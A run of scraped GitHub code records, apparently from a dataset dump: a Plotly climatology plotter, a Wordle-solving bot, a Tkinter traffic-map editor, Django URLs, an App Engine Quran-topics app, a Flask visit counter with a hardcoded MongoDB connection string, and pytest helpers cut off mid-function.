go.Scatter(\n x=high_records.index, y=high_records.values,\n name=f'{pd.to_datetime(\"today\").year} Record'.upper(),\n mode='markers',\n marker=dict(size=6, color='white'),\n hoverinfo='none'\n ))\n fig.add_trace(\n go.Scatter(\n x=xdates, y=df['Record High'],\n name='Record High'.upper(),\n mode='markers',\n marker=dict(size=3, color='orange')\n ))\n # Average highs\n fig.add_trace(\n go.Scatter(\n x=xdates, y=cos_fit(df['Average High']).round(1),\n name='Average High'.upper(),\n marker=dict(size=3, color='red')\n ))\n # Daily average\n fig.add_trace(\n go.Scatter(\n x=xdates, y=cos_fit(df['Monthly Average']).round(1),\n name='Monthly Average'.upper(),\n marker=dict(size=3, color='grey')\n ))\n # Average lows\n fig.add_trace(\n go.Scatter(\n x=xdates,\n y=cos_fit(df['Average Low']).round(1),\n name='Average Low'.upper(),\n marker=dict(size=3, color='purple')\n ))\n # Record lows\n fig.add_trace(\n go.Scatter(\n x=xdates, y=df['Record Low'],\n name='Record Low'.upper(),\n mode='markers',\n marker=dict(size=3, color='white')\n ))\n # Hover box\n fig.update_traces(\n # mode = 'markers', \n hoverlabel = dict(bordercolor='white')\n )\n # Plot settings\n fig.update_layout(\n template='plotly_dark',\n # paper_bgcolor='rgba(0,0,0,0)',\n # plot_bgcolor='rgba(0,0,0,0)',\n height=600, width=1000,\n title=dict(text=f'Monthly {var} Climatology (\\u00B0F) for {station}'.upper()+\n '
NOAA CO-OPS Site {} | {} - {}'.format(\n stationid,\n first_time.strftime('%m/%d/%Y'),\n last_time.strftime('%m/%d/%Y')),\n font=dict(size=20,\n # family='PT Sans Narrow'\n )),\n # yaxis = dict(title=f'{var} ({vk.units[var]})'.upper()),\n xaxis = dict(showgrid=False, showspikes=True,\n dtick='M1', tickformat='%b %d'),\n hovermode='x unified',\n legend=dict(itemsizing='constant'),\n hoverlabel=dict(font_size=12,\n # font_family=\"Rockwell\"\n )\n )\n if show:\n fig.show()\n else:\n return fig\n\n# =============================================================================\n# MAIN PROGRAM\n\ndef main():\n # Parse command line arguments\n args = parse_args()\n if not args.outdir:\n args.outdir = os.getcwd()\n\n # Download data\n data = Data(stationname=args.station, stationid=args.id, units=args.units,\n timezone=args.timezone, datum=args.datum, outdir=args.outdir,\n hr_threshold=args.hr,\n day_threshold=args.day,\n verbose=args.verbose)\n data.update_data()\n data.update_stats()\n\n # Plots\n vars = data.get_variables()\n plotDir = os.path.join(os.getcwd(), '_includes')\n if not os.path.exists(plotDir):\n os.makedir(plotDir)\n for var in vars:\n # Daily climatology\n dayfig = daily_climo(data.get_daily_stats_table(),\n var=var,\n station=data.get_station(),\n stationid=data.get_stationid(),\n first_time=data.filtered_data[var].dropna(axis=0).index.min(),\n last_time=data.filtered_data[var].dropna(axis=0).index.max())\n fname = 'figure-{}-{}-daily.html'.format(\n data.camel(data.get_station()).lower(),\n var.lower().replace(' ', ''))\n pio.write_html(dayfig, file=os.path.join(plotDir, fname),\n auto_open=True)\n\n # Monthly climatology\n monfig = monthly_climo(data.get_monthly_stats_table(),\n var=var,\n station=data.get_station(),\n stationid=data.get_stationid(),\n first_time=data.filtered_data[var].dropna(axis=0).index.min(),\n last_time=data.filtered_data[var].dropna(axis=0).index.max())\n fname = 'figure-{}-{}-monthly.html'\\\n .format(data.camel(data.get_station()).lower(),\n var.lower().replace(' ', ''))\n pio.write_html(monfig, file=os.path.join(plotDir, fname),\n auto_open=True)\n\nif __name__ == \"__main__\":\n main()","repo_name":"mdgrossi/climatologyweb","sub_path":"climoDL.py","file_name":"climoDL.py","file_ext":"py","file_size_in_byte":14982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11425034533","text":"import random\nimport web_driver_connection.main_driver\nimport web_driver_connection.main_driver\nimport os\n\ndef load_words(l = 5):\n with open('words_alpha.txt') as word_file:\n valid_words = set(word_file.read().split())\n\n return valid_words\n\n\ndef search(words,greens, yellows, blacks):\n print(greens, yellows, blacks)\n print([yellows[b] for b in yellows])\n one = {word for word in words if len([yellows[b] for b in yellows if b in word]) == len(yellows)}\n two = {word for word in words if len([b for b in blacks if len([i for i in range(len(blacks[b])) if word[blacks[b][i] != b]]) == len(blacks[b])]) == len(blacks)}\n three = {word for word in words if len([b for b in greens if len([i for i in range(len(greens[b])) if word[greens[b][i]] == b]) == len(greens[b])]) == len(greens)}\n\n print(one)\n\n res = {word for word in words\n if len([b for b in yellows if b in word]) == len(yellows)\n and len([b for b in blacks if len([i for i in range(len(blacks[b])) if word[blacks[b][i] != b]]) == len(blacks[b])]) == len(blacks)\n and len([b for b in greens if len([i for i in range(len(greens[b])) if word[greens[b][i]] == b]) == len(greens[b])]) == len(greens)}\n return res\n\n\ndef check_greens(word, greens):\n valid = not any([True for buchstabe in greens for i in greens[buchstabe] if word[i] != buchstabe])\n return valid\n\n\ndef check_yellows(word, yellows):\n print(word)\n valid = not any([True for buchstabe in yellows for i in yellows[buchstabe] if word[i] == buchstabe])\n for i, s in enumerate(word):\n if s in yellows:\n if i in yellows[s]:\n valid = False\n\n for i in yellows:\n if i not in word:\n valid = False\n\n #print(\"filtering for yellow condition\")\n #print(valid)\n\n\n return valid\n\n\ndef check_blacks(word, blacks):\n valid = not any([True for buchstabe in blacks if buchstabe in word])\n\n return valid\n\n\ndef check(alpha_pos, greens, yellows, blacks, words):\n valid_words = {word for word in words if check_greens(word, greens) and check_yellows(word, yellows) and check_blacks(word, blacks)}\n\n return valid_words\n\n\ndef val_append(dict_obj, key, value):\n if key in dict_obj:\n if not isinstance(dict_obj[key], list):\n # converting key to list type\n dict_obj[key] = [dict_obj[key]]\n # Append the key's value in list\n if value in dict_obj[key]:\n return\n dict_obj[key].append(value)\n else:\n dict_obj.update({key: [value]})\n\n\ndef apply_potential_count(alpha_pos, key):\n for position in alpha_pos[key]:\n if alpha_pos[key][position] != 'locked':\n lock = [i for i in alpha_pos[key] if alpha_pos[key][i] == 'locked']\n alpha_pos[key][position] = len(alpha_pos[key]) - len([i for i in alpha_pos[key] if alpha_pos[key][i] == 'locked'])\n\n\ndef apply_greens(alpha_pos, greens):\n print(\"applying green to: \")\n print(alpha_pos)\n for green in greens:\n indizes = greens[green]\n for i in indizes:\n if i in alpha_pos[green]:\n alpha_pos[green][i] = 'locked'\n apply_potential_count(alpha_pos, green)\n print(\"green applied:\")\n print(alpha_pos)\n\n\ndef apply_yellows(alpha_pos, yellows):\n print(\"applying yellow to: \")\n print(alpha_pos)\n print(yellows)\n for yellow in yellows:\n indizes = yellows[yellow]\n for i in indizes:\n if i in alpha_pos[yellow]:\n if alpha_pos[yellow][i] != 'locked':\n del alpha_pos[yellow][i]\n\n apply_potential_count(alpha_pos, yellow)\n print(\"yellow applied: \")\n print(alpha_pos)\n\n\ndef apply_blacks(alpha_pos, blacks):\n print(\"applying black to: \")\n print(alpha_pos)\n for black in blacks:\n indizes = blacks[black]\n for i in indizes:\n if i in alpha_pos[black]:\n if alpha_pos[black][i] != 'locked':\n del alpha_pos[black][i]\n\n print(\"black applied: \")\n print(alpha_pos)\n\n\ndef simulate(words_input, greens_input, words_dict):\n alph = 'abcdefghijklmnopqrstuvwxyz'\n alpha_pos = {}\n n = len(words_input[0])\n for b in alph:\n alpha_pos.update({b: {i : n for i in range(n)}})\n greens, yellows, blacks = {}, {}, {}\n forbidden = {}\n for word_input, green_input in zip(words_input, greens_input):\n print(word_input)\n new_greens = green_input\n new_greens = [int(s) for s in new_greens.split(\" \") if len(new_greens) != 0]\n {val_append(greens, s.lower(), i) for i, s in enumerate(word_input) if i in new_greens}\n {val_append(yellows, s.lower(), i) for i, s in enumerate(word_input) if s.isupper() and i not in new_greens}\n\n new_yellows = [s.lower() for i, s in enumerate(word_input) if s.isupper() and i not in new_greens]\n {val_append(blacks, s.lower(), i) for i, s in enumerate(word_input) if s.islower() and i not in new_greens and i not in new_yellows}\n\n word_input = word_input.lower()\n for g in new_greens:\n # print(\"!!!\")\n # print(g)\n # print(word_input[g])\n if word_input[g] in yellows:\n del yellows[word_input[g]]\n apply_greens(alpha_pos, greens)\n apply_yellows(alpha_pos, yellows)\n apply_blacks(alpha_pos, blacks)\n\n words_dict = check(alpha_pos, greens, yellows, blacks, words_dict)\n print(words_dict)\n print(\"keyboard\")\n print(greens)\n print(new_greens)\n print(yellows)\n print(blacks)\n\n\ndef play(words_dict):\n alph = 'abcdefghijklmnopqrstuvwxyz'\n alpha_pos = {}\n\n web_connector = web_driver_connection.main_driver.WordleConnection()\n\n for b in alph:\n alpha_pos.update({b: {i: 5 for i in range(5)}})\n greens, yellows, blacks = {}, {}, {}\n\n guess_list = [word for word in words_dict]\n sorted_by_vowels = sorted(guess_list, key=lambda word: sum(ch in 'aeiou' for ch in word), reverse=True)\n relevancy_dict = relevancy_score(guess_list)\n\n output = ('sorted by vowels: ', sorted(sorted_by_vowels,\n key=lambda word: sum(ch in 'aeiou' for ch in word if ch not in greens)))\n\n\n output_relevant = compare_guess(guess_list, relevancy_dict)\n next_guess = 'salet'\n\n\n # input(\"load...\")\n while len(words_dict) >= 1:\n word_input, new_greens = web_connector.write(guess=next_guess)\n while not word_input:\n print(\"here\")\n print(word_input)\n next_guess = generate_guess(guess_list, output_relevant)\n print(next_guess)\n word_input, new_greens = web_connector.write(guess=next_guess)\n\n\n #new_greens = [int(s) for s in new_greens.split(\" \") if len(new_greens) != 0]\n {val_append(greens, s.lower(), i) for i, s in enumerate(word_input) if i in new_greens}\n {val_append(yellows, s.lower(), i) for i, s in enumerate(word_input) if s.isupper() and i not in new_greens}\n\n new_yellows = [s.lower() for i, s in enumerate(word_input) if s.isupper() and i not in new_greens]\n\n {val_append(blacks, s.lower(), i) for i, s in enumerate(word_input) if\n (s.islower() and s not in [word_input[new_g].lower() for new_g in new_greens] and i not in new_yellows)}\n\n\n word_input = word_input.lower()\n for g in new_greens:\n print(\"!!!\")\n print(g)\n print(word_input[g])\n if word_input[g] in yellows:\n del yellows[word_input[g]]\n apply_greens(alpha_pos, greens)\n apply_yellows(alpha_pos, yellows)\n apply_blacks(alpha_pos, blacks)\n print('G Y B', greens, yellows, blacks)\n\n words_dict_filtered = check(alpha_pos, greens, yellows, blacks, words_dict)\n\n guess_list_filtered = [word for word in words_dict_filtered]\n\n sorted_by_vowels = sorted(guess_list_filtered, key = lambda word: sum(ch in 'aeiou' for ch in word))\n\n relevancy_dict = relevancy_score(guess_list_filtered)\n\n output = ('sorted by vowels: ', sorted(sorted_by_vowels,\n key = lambda word: sum(ch in 'aeiou' for ch in word if ch not in greens)))\n\n output_relevant = compare_guess(guess_list_filtered, relevancy_dict)\n\n # output = liste, output relevant = relevanzliste\n print(output)\n print(output_relevant)\n print(len(words_dict) + len(output))\n next_guess = generate_guess(guess_list, output_relevant)\n print(next_guess)\n\n\ndef relevancy_score(input_dict):\n import csv\n\n with open('unigram_freq.csv', mode='r') as inp:\n word_frequency = csv.reader(inp)\n dict_from_csv = {int(rows[1]): rows[0] for rows in word_frequency}\n\n #print(dict_from_csv)\n\n# filter dict 5 letter words\n relevancy_dict = {}\n\n for (key, value) in dict_from_csv.items():\n # Check if len == 5\n if len(value) == 5:\n relevancy_dict[key] = value\n #print(\"Sortiert nach Relevanz: \", relevancy_dict)\n return relevancy_dict\n\ndef compare_guess(guess_list, relevancy_dict):\n\n output_relevant = [word for (key, word) in relevancy_dict.items() if word in guess_list]\n\n return output_relevant\n\ndef generate_guess(guess_list, output_relevant):\n if len(output_relevant) > 0:\n print(\"output relevant\")\n print(output_relevant)\n guess = random.choice(output_relevant)\n print ('GUESS: ', guess)\n return guess\n else:\n print(\"guess_list\")\n print(guess_list)\n guess = random.choice(guess_list)\n print('GUESS:',guess)\n return guess\n\ndef pre_processing():\n english_words = load_words()\n words_dict = {word: 1 for word in english_words if len(word) == 5}\n guess_list = [word for word in words_dict]\n relevancy_dict = relevancy_score(words_dict)\n frequent_words = open('unigram_freq.csv', mode='r')\n\n output_relevant = compare_guess(guess_list, relevancy_dict)\n\n return words_dict, guess_list\n\n\nif __name__ == '__main__':\n words_dict, guess_list = pre_processing()\n\n print(play(words_dict))\n\n\n '''\n # run relevancy_score:\n english_words = load_words()\n words_dict = {word: 1 for word in english_words if len(word) == 5}\n guess_list = [word for word in words_dict]\n sorted_by_vowels = guess_list\n relevancy_dict = relevancy_score(words_dict)\n\n\n print(compare_guess(guess_list, relevancy_dict))\n\n\n '''\n\n '''# run wordle:\n\n starters = ['louse', 'ahead', 'house']\n #test = ['aunts', 'mIght', 'bRIck', 'PRIdE']\n #greens = ['' , '', '1 2', '0 1 2 4']\n test = ['eAGle', 'AmONG', 'prize', 'suCks', 'biNit']\n greens = ['', '', '', '', '2']\n\n\n english_words = load_words()\n words_dict = {word: 1 for word in english_words if len(word) == 5}\n guess_list = [word for word in words_dict]\n relevancy_dict = relevancy_score(words_dict)\n solution_list = compare_guess(guess_list, relevancy_dict)\n\n play(words_dict, guess_list)\n #simulate(test, greens, words_dict)\n '''\n\n\n\n\n\n","repo_name":"FabianBirringer/worlde_bot","sub_path":"wordle_main.py","file_name":"wordle_main.py","file_ext":"py","file_size_in_byte":11063,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73361423929","text":"import tkinter as tk\nfrom PIL import Image, ImageTk\nfrom math import cos, sin, atan, sqrt, acos\n\nmap_filename = \"maps/map0.png\"\nimage = Image.open(map_filename)\n\nW, H = image.size\nmargin = 5000\ndx,dy = 20,20 # Elementary move for the canvas\n\ncross_list = []\ngenerator_cross_list = []\nroad_coords_list = []\n\nroot = tk.Tk()\n\ndef angle(x,y):\n \"\"\"Give the oriented angle [-3.14 ; +3.14] between the vector (x,y) and the horizontal axis (1,0)\"\"\"\n # The y-axis is \"reversed\" in Tkinter !\n # We use vector product to find the orientation of the vectors\n sign = 1 if y >= 0 else -1\n # We use scalar product to find the angle and multiply it by the orientation\n return acos((x) / sqrt(x*x + y*y)) * sign\n\ndef distance(x1,y1, x2, y2):\n return ((x2-x1)**2 + (y2-y1)**2)**0.5\n\n\nclass Map(tk.Canvas):\n def __init__(self, master, width, height, background):\n # Initialize a canvas\n tk.Canvas.__init__(self, master=master, width=width, height=height, background=background)\n # Keep track of the current scale to make correct operations when zoomed in or out\n self.current_scale = 1\n self.orig_img = image\n self.bg = None\n self.redraw_bg()\n self.configure(scrollregion=(-margin, -margin, margin, margin))\n self.configure(xscrollincrement=1)\n self.configure(yscrollincrement=1)\n self.create_rectangle(0,0,W-1, H-1, tags=\"container\")\n\n def scroll_start(self, event):\n # Save the current position of the map\n self.scan_mark(event.x, event.y)\n\n def scroll_move(self, event):\n # Move the map accordingly to the new event position\n self.scan_dragto(event.x, event.y, gain=1)\n\n def zoom(self, event):\n # Zoom in if the user scrolls up, zoom out otherwise\n factor = 0\n if event.delta > 0 or event.keysym == \"Up\":\n factor = 2\n elif event.delta < 0 or event.keysym == \"Down\":\n factor = .5\n\n # Scale every object on the canvas by (factor)\n self.current_scale *= factor\n self.redraw_bg(self.canvasx(event.x), self.canvasy(event.y))\n self.scale(\"all\", 0,0 , factor, factor)\n margin = self.current_scale * 5000\n\n # Reconfiguration for the scrollbars\n self.configure(scrollregion=(-margin, -margin, margin, margin))\n x,y = self.canvasx(event.x), self.canvasy(event.y)\n\n\n self.xview_scroll(int(x*(factor-1)), \"units\")\n self.yview_scroll(int(y*(factor-1)), \"units\")\n\n def redraw_bg(self, x=0, y=0):\n if self.bg: self.delete(self.bg)\n w, h = self.orig_img.size\n s = self.current_scale\n\n tmp = self.orig_img.crop((0,0, w, h))\n self.img = ImageTk.PhotoImage(tmp.resize((int(w*s),int(h*s))))\n self.bg = self.create_image(0,0, image=self.img, anchor=\"nw\", tag = \"bg\")\n self.tag_lower(\"bg\", \"all\")\n\n def draw_cross(self, x, y, build_type):\n radius = 10 * self.current_scale\n if build_type == \"cross\":\n a = self.create_oval(x-radius, y-radius, x+radius, y+radius, fill=\"grey26\", outline = \"grey26\", tag=\"cross\")\n elif build_type == \"generator\":\n a = self.create_oval(x-radius, y-radius, x+radius, y+radius, fill=\"grey26\", outline = \"red\", tag=\"generator\")\n return a\n\n def draw_road(self, road):\n (l, w) = (distance(road.cross1.x, road.cross1.y, road.cross2.x, road.cross2.y), 5)\n ang = angle(road.cross2.x-road.cross1.x, road.cross2.y-road.cross1.y)\n s = self.current_scale\n (x,y) = road.cross2.x*s, road.cross2.y*s\n dx = s*sin(ang)*w/2\n dy = - s*cos(ang)*w/2\n dxb = -s*l*cos(ang)\n dyb = -s*l*sin(ang)\n return self.create_polygon(x+dx, y+dy, x-dx, y-dy, x+dxb-dx, y+dyb-dy, x+dxb+dx, y+dyb+dy, fill=\"grey26\", tag=\"road\")\n\n\nclass Container(tk.Frame):\n def __init__(self, root):\n # Initialize a Frame\n tk.Frame.__init__(self, root)\n # Initialize the canvas representating the map\n self.map = Map(self, W, H, \"SeaGreen1\")\n self.map.create_rectangle(0,0,W-1, H-1, tags=\"container\")\n\n # Setting up scrollbars to be able to move the map in the window\n self.xsb = tk.Scrollbar(self, orient=\"horizontal\", command=self.map.xview)\n self.ysb = tk.Scrollbar(self, orient=\"vertical\", command=self.map.yview)\n self.map.configure(yscrollcommand=self.ysb.set, xscrollcommand=self.xsb.set)\n\n # Place the canvas and scrollbars in their correct positions\n # Using a grid system to sustain further modifications of the layout\n self.xsb.grid(row=1, column=0, sticky=\"ew\")\n self.ysb.grid(row=0, column=1, sticky=\"ns\")\n self.map.grid(row=0, column=0, sticky=\"nsew\")\n\n # Allows the canvas to expand as much as it can\n self.grid_rowconfigure(0, weight=1)\n self.grid_columnconfigure(0, weight=1)\n\nclass Controls(tk.Frame):\n def __init__(self, root):\n tk.Frame.__init__(self, root)\n self.creation_menu = tk.LabelFrame(self, text=\"Creation menu\", padx=5, pady=5)\n self.creation_menu.grid(row=0, column=0, sticky=\"new\")\n\n self.build_type = tk.StringVar()\n self.build_type.set(\"generator\")\n self.cross_b = tk.Radiobutton(self.creation_menu, text=\"Generator\", variable=self.build_type, value=\"generator\")\n self.generator_cross_b = tk.Radiobutton(self.creation_menu, text=\"Cross\", variable=self.build_type, value=\"cross\")\n self.road_b = tk.Radiobutton(self.creation_menu, text=\"Road\", variable=self.build_type, value=\"road\")\n self.priority_axis_b = tk.Radiobutton(self.creation_menu, text=\"Priority\", variable = self.build_type, value=\"priority\")\n self.cross_b.grid(row=0, column=0)\n self.generator_cross_b.grid(row=0, column=1)\n self.road_b.grid(row=0, column=2)\n self.priority_axis_b.grid(row=1, column=1)\n\n self.generate_b = tk.Button(self.creation_menu, text=\"Extract data !\", command=extract_data)\n self.generate_b.grid(row=2, column=1)\n\n self.information = tk.LabelFrame(self, text=\"Information\", padx=5, pady=5)\n self.information.grid(row=1, column=0, sticky=\"new\")\n\n tk.Label(master = self.information, text = \"Nombre de croisements : \").grid(row=0, column=0)\n self.nb_cross = tk.IntVar()\n self.nb_cross.set(0)\n tk.Label(master = self.information, textvariable = self.nb_cross).grid(row=0, column=1)\n self.nb_roads = tk.IntVar()\n self.nb_roads.set(0)\n tk.Label(master = self.information, text=\"Nombre de routes : \").grid(row=1, column=0)\n tk.Label(master = self.information, textvariable = self.nb_roads).grid(row=1, column=1)\n\ndef keyboard_listener(event):\n if event.char == \" \":\n controls.build_type.set(False) if controls.build_type.get() else controls.build_type.set(True)\n elif event.keysym == \"Right\":\n map.scan_mark(0,0)\n map.scan_dragto(-dx,0)\n elif event.keysym == \"Left\":\n map.scan_mark(0,0)\n map.scan_dragto(dx,0)\n elif event.keysym == \"Up\":\n map.scan_mark(0,0)\n map.scan_dragto(0,dy)\n elif event.keysym == \"Down\":\n map.scan_mark(0,0)\n map.scan_dragto(0,-dy)\n\n\nclass Cross:\n list = []\n def __init__(self, x, y, rep):\n self.x = x\n self.y = y\n self.rep = rep\n self.roads = []\n self.priority_axis = []\n Cross.list.append(self)\nclass Generator:\n list = []\n def __init__(self, x, y, rep):\n self.x = x\n self.y = y\n self.rep = rep\n self.roads = []\n self.priority_axis = []\n Generator.list.append(self)\nclass Road:\n list = []\n def __init__(self, cross1, cross2, rep):\n self.cross1 = cross1\n self.cross2 = cross2\n self.priority_indicator_1 = None\n self.priority_indicator_2 = None\n self.rep = rep\n Road.list.append(self)\n\n\nselected_cross = []\ncross_for_priority = None\nreal_cross_priority = None\nselected_roads = []\n\ndef selector(event):\n \"\"\"Take the correct action according to the user input\"\"\"\n global cross_for_priority, real_cross_priority, selected_roads\n x,y = map.canvasx(event.x), map.canvasy(event.y)\n s = map.current_scale\n objects = list(map.find_overlapping(x, y, x, y))\n for obj in objects:\n if \"bg\" in map.gettags(obj):\n objects.remove(obj)\n print(objects)\n mode = controls.build_type.get()\n\n if mode == \"cross\" or mode == \"generator\":\n if len(objects) == 0:\n if controls.build_type.get() == \"generator\":\n Generator(x//s,y//s, map.draw_cross(x,y, \"generator\"))\n elif controls.build_type.get() == \"cross\":\n Cross(x//s, y//s, map.draw_cross(x,y, \"cross\"))\n controls.nb_cross.set(controls.nb_cross.get()+1)\n\n if len(objects) == 1:\n obj = objects[0]\n tags = map.gettags(obj)\n print(tags)\n if \"cross\" in tags :\n for c in Cross.list:\n if c.rep == obj:\n map.delete(c.rep)\n controls.nb_cross.set(controls.nb_cross.get()-1)\n Cross.list.remove(c)\n elif \"generator\" in tags:\n for g in Generator.list:\n if g.rep == obj:\n map.delete(g.rep)\n controls.nb_cross.set(controls.nb_cross.get()-1)\n Generator.list.remove(g)\n elif \"road\" in tags:\n for r in Road.list:\n if r.rep == obj:\n map.delete(r.rep)\n controls.nb_roads.set(controls.nb_roads.get()-1)\n Road.list.remove(r)\n\n elif mode == \"road\":\n if len(objects) == 1:\n obj = objects[0]\n tags = map.gettags(obj)\n if \"road\" in tags:\n for r in Road.list:\n if r.rep == obj:\n map.delete(r.rep)\n controls.nb_roads.set(controls.nb_roads.get()-1)\n road = Road.list.pop(Road.list.index(r))\n road.cross1.roads.remove(road)\n road.cross2.roads.remove(road)\n elif \"cross\" in tags or \"generator\" in tags:\n if obj not in selected_cross:\n selected_cross.append(obj)\n map.itemconfig(obj, fill=\"green\")\n if len(selected_cross) == 2:\n real_cross = []\n for c in Cross.list:\n if c.rep in selected_cross:\n real_cross.append(c)\n for g in Generator.list:\n if g.rep in selected_cross:\n real_cross.append(g)\n road = Road(real_cross[0], real_cross[1], None)\n real_cross[0].roads.append(road)\n real_cross[1].roads.append(road)\n road.rep = map.draw_road(road)\n controls.nb_roads.set(controls.nb_roads.get()+1)\n for obj in selected_cross:\n map.itemconfig(obj, fill=\"grey26\")\n selected_cross.clear()\n\n else:\n selected_cross.remove(obj)\n map.itemconfig(obj, fill=\"grey26\")\n\n elif mode == \"priority\":\n if len(objects) == 1:\n obj = objects[0]\n tags = map.gettags(obj)\n\n if \"cross\" in tags or \"generator\" in tags:\n if cross_for_priority != obj:\n map.itemconfig(cross_for_priority, fill=\"grey26\")\n cross_for_priority = obj\n map.itemconfig(obj, fill=\"pink\")\n for c in Cross.list:\n if c.rep == obj :\n real_cross_priority = c\n for g in Generator.list:\n if g.rep == obj :\n real_cross_priority = g\n\n\n if \"road\" in tags:\n if cross_for_priority != None:\n for r in Road.list:\n if r.rep == obj:\n if r not in real_cross_priority.priority_axis:\n real_cross_priority.priority_axis.append(r)\n radius = 2 * map.current_scale\n if real_cross_priority== r.cross1:\n r.priority_indicator_1 = map.create_oval(x-radius, y-radius, x+radius, y+radius, fill=\"red\")\n else:\n r.priority_indicator_2 = map.create_oval(x-radius, y-radius, x+radius, y+radius, fill=\"red\")\n else:\n real_cross_priority.priority_axis.remove(r)\n if real_cross_priority== r.cross1:\n map.delete(r.priority_indicator_1)\n else:\n map.delete(r.priority_indicator_2)\n\n\n if len(objects) > 2:\n print(\"Cas pas prévu, boulet !\")\n\ndef extract_data():\n print(\"extracting data\")\n scale = 200/91\n file = open(\"maps/map_data.txt\", \"w\")\n cross_list = []\n road_list = []\n for g in Generator.list:\n cross_list.append(g)\n file.write(\"{} {}\\n\".format(g.x*scale, g.y*scale))\n file.write(\"\\n\")\n for c in Cross.list:\n cross_list.append(c)\n file.write(\"{} {} {} \\n\".format(c.x*scale, c.y*scale, True))\n file.write(\"\\n\")\n for r in Road.list:\n file.write(\"{} {} \\n\".format(cross_list.index(r.cross1), cross_list.index(r.cross2)))\n file.write(\"\\n\")\n for c in cross_list:\n if len(c.roads) > 2:\n file.write(\"{} {} {}\\n\".format(cross_list.index(c), Road.list.index(c.priority_axis[0]), Road.list.index(c.priority_axis[1])))\n file.close()\n\nroot.state('zoomed') # Maximize the window\ncontainer = Container(root)\ncontainer.grid(row=0, column=0, sticky=\"nsew\")\nmap = container.map\nroot.grid_rowconfigure(0, weight=2)\nroot.grid_columnconfigure(0, weight=2)\ncontrols = Controls(root)\ncontrols.grid(row=0, column=1, sticky=\"nsew\")\n\n# Event-listeners\nroot.bind(\"\", keyboard_listener)\nmap.bind(\"\", map.scroll_start)\nmap.bind(\"\", map.scroll_move)\nmap.bind(\"\", map.zoom)\nroot.bind(\"\", map.zoom)\nmap.bind(\"\", selector)\n\nroot.mainloop()\n","repo_name":"FabAlchemy/traffic-simulator","sub_path":"Traffic Simulation/map_creator.py","file_name":"map_creator.py","file_ext":"py","file_size_in_byte":14641,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"30138998761","text":"from django.urls import path\nfrom djangoapp.views import Materials, Groups, Works, Download, UploadWork, UploadMaterial, Delete, Redirect\n\nurlpatterns = [\n path('', Redirect.as_view(), name='main'),\n path('groups', Groups.as_view(), name='groups'),\n path('materials', Materials.as_view(), name='materials'),\n path('works', Works.as_view(), name='works'),\n path('delete/', Delete.as_view(), name='delete'),\n path('download/', Download.as_view(), name='download'),\n path('upload-material', UploadMaterial.as_view(), name='upload-material'),\n path('upload-work/', UploadWork.as_view(), name='upload-work'),\n]\n","repo_name":"SLinartS/kr_django","sub_path":"djangoapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72069146488","text":"import cgi\nimport logging\nimport os\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext import db\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom controllers.entities import Sura, Topic\nfrom controllers.page_controller import PageController\n\n\n\n\nclass MainPage(PageController):\n def perform_get(self):\n topics = Topic.all()\n self.template_values['topics'] = topics\n return 'index.html'\n\n\nclass SurasListPage(PageController):\n def perform_get(self):\n suras = Sura.gql(\"order by number\").fetch(114)\n self.template_values['suras'] = suras\n return 'suras_list.html'\n\n\nclass SurasDisplayPage(PageController):\n def perform_get(self):\n leading_length = len('/display_sura/')\n sura_number = int(self.request.path[leading_length:])\n sura = Sura.gql(\"WHERE number = :number \", number = int(sura_number)).fetch(1)[0]\n ayat = sura.aya_set\n ayat.order('number')\n\n self.template_values['sura'] = sura\n self.template_values['ayat'] = ayat\n \n return 'sura_display.html'\n\n\nclass SearchTopics(PageController):\n def perform_get(self):\n return \"/\"\n\n def perform_post(self):\n search_for = self.request.get('search_for')\n topics = Topic.all().search(search_for)\n\n self.template_values['topics'] = topics\n \n return 'search_results.html'\n\nclass StaticPages(PageController):\n def perform_get(self):\n page_name = self.request.path[1:]\n return page_name + \".html\"\n\n\napplication = webapp.WSGIApplication(\n [('/', MainPage),\n ('/list_suras', SurasListPage),\n ('/display_sura/.*', SurasDisplayPage),\n ('/search', SearchTopics),\n ('/.*', StaticPages)],\n debug=True)\n\ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()","repo_name":"gaussianera/qurantopics","sub_path":"QuranTopics/controllers/qurantopics.py","file_name":"qurantopics.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37117776098","text":"from flask import Flask\nfrom datetime import datetime\nimport pymongo\napp = Flask(__name__)\n\nmyclient = pymongo.MongoClient('mongodb+srv://thuan:thuan@cluster0.9gguq.mongodb.net/test')\nmydb = myclient[\"mydatabase\"]\n\n@app.route(\"/\")\ndef hello():\n NOW = datetime.now()\n mydb.visits.insert_one({'created_at': NOW})\n num = mydb.visits.count_documents({})\n return f\"Số lượt truy cập: {num}\"","repo_name":"superbakuryu/flask_heroku","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18094117568","text":"import pytest\n\nParameterSet = type(pytest.param())\n\n\ndef extract_fixtures_values(item):\n \"\"\"Extracts names and values of all the fixtures that the test has.\n\n Args:\n item: py.test test item\n Returns:\n :py:class:`dict` with fixtures and their values.\n \"\"\"\n if hasattr(item, \"callspec\"):\n return item.callspec.params.copy() # protect against accidential manipulation of the spec\n else:\n # Some of the test items do not have this, so fall back\n # This can cause some problems if the fixtures are used in the guards in this case, but\n # that will tell use where is the problem and we can then find it out properly.\n return {}\n\n\ndef trim_items(iterable, keep_index):\n return [e[1]\n for e in enumerate(iterable)\n if e[0] in keep_index]\n\n\ndef fixture_filter(metafunc, argnames, argvalues):\n \"\"\"Filter fixtures based on fixturenames in\n the function represented by ``metafunc``\"\"\"\n\n # Identify indices of matches between argnames and fixturenames\n keep_index = [e[0] for e in enumerate(argnames) if e[1] in metafunc.fixturenames]\n\n # Keep items at indices in keep_index\n def f(values):\n if isinstance(values, (list, tuple)) and not isinstance(values, ParameterSet):\n return trim_items(values, keep_index)\n else:\n 